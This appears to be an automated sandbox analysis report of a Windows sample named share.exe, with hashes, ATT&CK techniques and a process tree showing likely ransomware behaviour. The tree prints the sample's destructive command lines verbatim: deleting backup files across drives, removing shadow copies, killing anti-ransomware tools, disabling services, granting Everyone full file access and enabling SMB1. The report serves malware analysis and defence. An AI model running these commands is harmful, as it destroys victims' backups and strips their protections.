9c684dc8aead69cdb480d8b048da597d9541d527ec4e9ad5371c449409d5ef17

Analysis

max time kernel
137s
max time network
166s
platform
windows7_x64
resource
win7v20210408
submitted
04/06/2021, 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

share.exe
Size

170KB
MD5

108d4532a263fca754b85d942bd55451
SHA1

202a1bf5238322372d1da89850a61c4c050a9edd
SHA256

b010e408ad75f379646832fa83567596c7918be1a54b80fc2b4207c33e57057d
SHA512

72735b3c1c03f7cf0462e59d231bddc8490f26a47690b5ca408313a633f9570d9aa140194439ec997d2e5638eae350bb1b9095857d9bd467e8488efbdd27638a

Score

8^/10

discovery evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2868	icacls.exe
2860	icacls.exe
2884	icacls.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	mountvol.exe
File opened (read-only)	\??\B:	mountvol.exe
File opened (read-only)	\??\E:	mountvol.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2384	1720	WerFault.exe	25

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3028	net.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
996	taskkill.exe
1876	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1340	powershell.exe
1340	powershell.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe
1720	share.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	1720	share.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeBackupPrivilege	1212	vssvc.exe
Token: SeRestorePrivilege	1212	vssvc.exe
Token: SeAuditPrivilege	1212	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1340	powershell.exe
Token: SeSecurityPrivilege	1340	powershell.exe
Token: SeTakeOwnershipPrivilege	1340	powershell.exe
Token: SeLoadDriverPrivilege	1340	powershell.exe
Token: SeSystemProfilePrivilege	1340	powershell.exe
Token: SeSystemtimePrivilege	1340	powershell.exe
Token: SeProfSingleProcessPrivilege	1340	powershell.exe
Token: SeIncBasePriorityPrivilege	1340	powershell.exe
Token: SeCreatePagefilePrivilege	1340	powershell.exe
Token: SeBackupPrivilege	1340	powershell.exe
Token: SeRestorePrivilege	1340	powershell.exe
Token: SeShutdownPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeSystemEnvironmentPrivilege	1340	powershell.exe
Token: SeRemoteShutdownPrivilege	1340	powershell.exe
Token: SeUndockPrivilege	1340	powershell.exe
Token: SeManageVolumePrivilege	1340	powershell.exe
Token: 33	1340	powershell.exe
Token: 34	1340	powershell.exe
Token: 35	1340	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2384	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1720 wrote to memory of 1268	1720	share.exe	31
PID 1720 wrote to memory of 1268	1720	share.exe	31
PID 1720 wrote to memory of 1268	1720	share.exe	31
PID 1720 wrote to memory of 1268	1720	share.exe	31
PID 1268 wrote to memory of 1392	1268	csc.exe	32
PID 1268 wrote to memory of 1392	1268	csc.exe	32
PID 1268 wrote to memory of 1392	1268	csc.exe	32
PID 1268 wrote to memory of 1392	1268	csc.exe	32
PID 1720 wrote to memory of 996	1720	share.exe	34
PID 1720 wrote to memory of 996	1720	share.exe	34
PID 1720 wrote to memory of 996	1720	share.exe	34
PID 1720 wrote to memory of 996	1720	share.exe	34
PID 1720 wrote to memory of 1876	1720	share.exe	36
PID 1720 wrote to memory of 1876	1720	share.exe	36
PID 1720 wrote to memory of 1876	1720	share.exe	36
PID 1720 wrote to memory of 1876	1720	share.exe	36
PID 1720 wrote to memory of 1620	1720	share.exe	38
PID 1720 wrote to memory of 1620	1720	share.exe	38
PID 1720 wrote to memory of 1620	1720	share.exe	38
PID 1720 wrote to memory of 1620	1720	share.exe	38
PID 1720 wrote to memory of 292	1720	share.exe	40
PID 1720 wrote to memory of 292	1720	share.exe	40
PID 1720 wrote to memory of 292	1720	share.exe	40
PID 1720 wrote to memory of 292	1720	share.exe	40
PID 1720 wrote to memory of 1988	1720	share.exe	44
PID 1720 wrote to memory of 1988	1720	share.exe	44
PID 1720 wrote to memory of 1988	1720	share.exe	44
PID 1720 wrote to memory of 1988	1720	share.exe	44
PID 1720 wrote to memory of 1388	1720	share.exe	43
PID 1720 wrote to memory of 1388	1720	share.exe	43
PID 1720 wrote to memory of 1388	1720	share.exe	43
PID 1720 wrote to memory of 1388	1720	share.exe	43
PID 1720 wrote to memory of 1760	1720	share.exe	42
PID 1720 wrote to memory of 1760	1720	share.exe	42
PID 1720 wrote to memory of 1760	1720	share.exe	42
PID 1720 wrote to memory of 1760	1720	share.exe	42
PID 1720 wrote to memory of 1976	1720	share.exe	45
PID 1720 wrote to memory of 1976	1720	share.exe	45
PID 1720 wrote to memory of 1976	1720	share.exe	45
PID 1720 wrote to memory of 1976	1720	share.exe	45
PID 1720 wrote to memory of 772	1720	share.exe	48
PID 1720 wrote to memory of 772	1720	share.exe	48
PID 1720 wrote to memory of 772	1720	share.exe	48
PID 1720 wrote to memory of 772	1720	share.exe	48
PID 1720 wrote to memory of 932	1720	share.exe	49
PID 1720 wrote to memory of 932	1720	share.exe	49
PID 1720 wrote to memory of 932	1720	share.exe	49
PID 1720 wrote to memory of 932	1720	share.exe	49
PID 1720 wrote to memory of 1772	1720	share.exe	53
PID 1720 wrote to memory of 1776	1720	share.exe	52
PID 1720 wrote to memory of 1776	1720	share.exe	52
PID 1720 wrote to memory of 1772	1720	share.exe	53
PID 1720 wrote to memory of 1776	1720	share.exe	52
PID 1720 wrote to memory of 1772	1720	share.exe	53
PID 1720 wrote to memory of 1776	1720	share.exe	52
PID 1720 wrote to memory of 1772	1720	share.exe	53
PID 1720 wrote to memory of 1256	1720	share.exe	54
PID 1720 wrote to memory of 1256	1720	share.exe	54
PID 1720 wrote to memory of 1256	1720	share.exe	54
PID 1720 wrote to memory of 1256	1720	share.exe	54
PID 1720 wrote to memory of 1356	1720	share.exe	55
PID 1720 wrote to memory of 1356	1720	share.exe	55
PID 1720 wrote to memory of 1356	1720	share.exe	55
PID 1720 wrote to memory of 1356	1720	share.exe	55

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	share.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	share.exe

C:\Users\Admin\AppData\Local\Temp\share.exe
"C:\Users\Admin\AppData\Local\Temp\share.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1720
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BCB.tmp" "c:\Users\Admin\AppData\Local\Temp\uuzg5401\CSC3B3AE650BD234159967F7DA4C12CC3C3.TMP"
    3⤵
    PID:1392
- C:\Windows\SysWOW64\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:996
- C:\Windows\SysWOW64\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1620
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:292
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
  2⤵
  PID:1760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
  2⤵
  PID:1388
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
  2⤵
  PID:1976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
  2⤵
  PID:772
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
  2⤵
  PID:932
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
  2⤵
  PID:1772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
  2⤵
  PID:1256
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config MBAMService start= disabled
  2⤵
  PID:1356
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1340
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1080
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1784
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config Dnscache start= auto
  2⤵
  PID:2092
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config FDResPub start= auto
  2⤵
  PID:2104
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config upnphost start= auto
  2⤵
  PID:2116
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config fdPHost start= auto
  2⤵
  PID:2184
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SSDPSRV start= auto
  2⤵
  PID:2176
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes
  2⤵
  PID:2516
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:2580
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\SysWOW64\mountvol.exe
  "mountvol.exe"
  2⤵
  PID:2672
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" A: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\
  2⤵
  - Enumerates connected drives
  PID:2720
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" B: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\
  2⤵
  - Enumerates connected drives
  PID:2768
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" E: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\
  2⤵
  - Enumerates connected drives
  PID:2784
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2868
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2860
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2884
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2944
- C:\Windows\SysWOW64\net.exe
  "net.exe" view
  2⤵
  - Discovers systems in the same network
  PID:3028
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" use \\10.7.0.39
  2⤵
  PID:2232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1544
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:2384

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1340-126-0x00000000060D0000-0x00000000060D1000-memory.dmp

Filesize
4KB

Download
memory/1340-140-0x0000000006210000-0x0000000006211000-memory.dmp

Filesize
4KB

Download
memory/1340-134-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1340-133-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/1340-99-0x00000000011C0000-0x00000000011C1000-memory.dmp

Filesize
4KB

Download
memory/1340-101-0x0000000001130000-0x0000000001131000-memory.dmp

Filesize
4KB

Download
memory/1340-125-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/1340-120-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/1340-141-0x00000000011C7000-0x00000000011D8000-memory.dmp

Filesize
68KB

Download
memory/1340-102-0x0000000005280000-0x0000000005281000-memory.dmp

Filesize
4KB

Download
memory/1340-100-0x00000000011C2000-0x00000000011C3000-memory.dmp

Filesize
4KB

Download
memory/1340-98-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/1340-97-0x0000000000D70000-0x0000000000D71000-memory.dmp

Filesize
4KB

Download
memory/1340-96-0x00000000754F1000-0x00000000754F3000-memory.dmp

Filesize
8KB

Download
memory/1720-103-0x000000000539F000-0x00000000053A0000-memory.dmp

Filesize
4KB

Download
memory/1720-195-0x00000000053AF000-0x00000000053B1000-memory.dmp

Filesize
8KB

Download
memory/1720-79-0x000000000539D000-0x000000000539E000-memory.dmp

Filesize
4KB

Download
memory/1720-104-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/1720-105-0x00000000053A1000-0x00000000053A2000-memory.dmp

Filesize
4KB

Download
memory/1720-107-0x00000000053A3000-0x00000000053A4000-memory.dmp

Filesize
4KB

Download
memory/1720-106-0x00000000053A2000-0x00000000053A3000-memory.dmp

Filesize
4KB

Download
memory/1720-108-0x00000000053A4000-0x00000000053A5000-memory.dmp

Filesize
4KB

Download
memory/1720-110-0x00000000053A6000-0x00000000053A8000-memory.dmp

Filesize
8KB

Download
memory/1720-109-0x00000000053A5000-0x00000000053A6000-memory.dmp

Filesize
4KB

Download
memory/1720-74-0x0000000005398000-0x0000000005399000-memory.dmp

Filesize
4KB

Download
memory/1720-73-0x0000000005397000-0x0000000005398000-memory.dmp

Filesize
4KB

Download
memory/1720-212-0x00000000053B7000-0x00000000053B9000-memory.dmp

Filesize
8KB

Download
memory/1720-210-0x0000000005398000-0x0000000005399000-memory.dmp

Filesize
4KB

Download
memory/1720-211-0x00000000053BE000-0x00000000053BF000-memory.dmp

Filesize
4KB

Download
memory/1720-208-0x00000000053A9000-0x00000000053B2000-memory.dmp

Filesize
36KB

Download
memory/1720-207-0x00000000053A2000-0x00000000053A8000-memory.dmp

Filesize
24KB

Download
memory/1720-76-0x000000000539A000-0x000000000539B000-memory.dmp

Filesize
4KB

Download
memory/1720-59-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/1720-72-0x0000000005396000-0x0000000005397000-memory.dmp

Filesize
4KB

Download
memory/1720-205-0x000000000539B000-0x000000000539D000-memory.dmp

Filesize
8KB

Download
memory/1720-163-0x00000000053A8000-0x00000000053A9000-memory.dmp

Filesize
4KB

Download
memory/1720-77-0x000000000539B000-0x000000000539C000-memory.dmp

Filesize
4KB

Download
memory/1720-164-0x00000000053A9000-0x00000000053AB000-memory.dmp

Filesize
8KB

Download
memory/1720-206-0x00000000053BA000-0x00000000053BD000-memory.dmp

Filesize
12KB

Download
memory/1720-203-0x00000000053BB000-0x00000000053C0000-memory.dmp

Filesize
20KB

Download
memory/1720-204-0x00000000068C0000-0x00000000068C2000-memory.dmp

Filesize
8KB

Download
memory/1720-201-0x00000000053B9000-0x00000000053BA000-memory.dmp

Filesize
4KB

Download
memory/1720-75-0x0000000005399000-0x000000000539A000-memory.dmp

Filesize
4KB

Download
memory/1720-202-0x00000000053BA000-0x00000000053BB000-memory.dmp

Filesize
4KB

Download
memory/1720-199-0x00000000053B7000-0x00000000053B9000-memory.dmp

Filesize
8KB

Download
memory/1720-198-0x00000000053B5000-0x00000000053B7000-memory.dmp

Filesize
8KB

Download
memory/1720-197-0x00000000053B3000-0x00000000053B5000-memory.dmp

Filesize
8KB

Download
memory/1720-196-0x00000000053B1000-0x00000000053B3000-memory.dmp

Filesize
8KB

Download
memory/1720-71-0x0000000005385000-0x0000000005396000-memory.dmp

Filesize
68KB

Download
memory/1720-193-0x00000000053AB000-0x00000000053AD000-memory.dmp

Filesize
8KB

Download
memory/1720-194-0x00000000053AD000-0x00000000053AF000-memory.dmp

Filesize
8KB

Download
memory/1720-61-0x0000000005380000-0x0000000005381000-memory.dmp

Filesize
4KB

Download
memory/1720-78-0x000000000539C000-0x000000000539D000-memory.dmp

Filesize
4KB

Download
memory/1720-80-0x000000000539E000-0x000000000539F000-memory.dmp

Filesize
4KB

Download
memory/1720-69-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/1720-70-0x0000000000750000-0x000000000076C000-memory.dmp

Filesize
112KB

Download
memory/2384-213-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/2640-178-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/2640-191-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/2640-155-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/2640-162-0x0000000004992000-0x0000000004993000-memory.dmp

Filesize
4KB

Download
memory/2640-152-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/2640-160-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/2640-161-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/2640-151-0x0000000000D50000-0x0000000000D51000-memory.dmp

Filesize
4KB

Download
memory/2640-175-0x0000000005680000-0x0000000005681000-memory.dmp

Filesize
4KB

Download
memory/2640-192-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download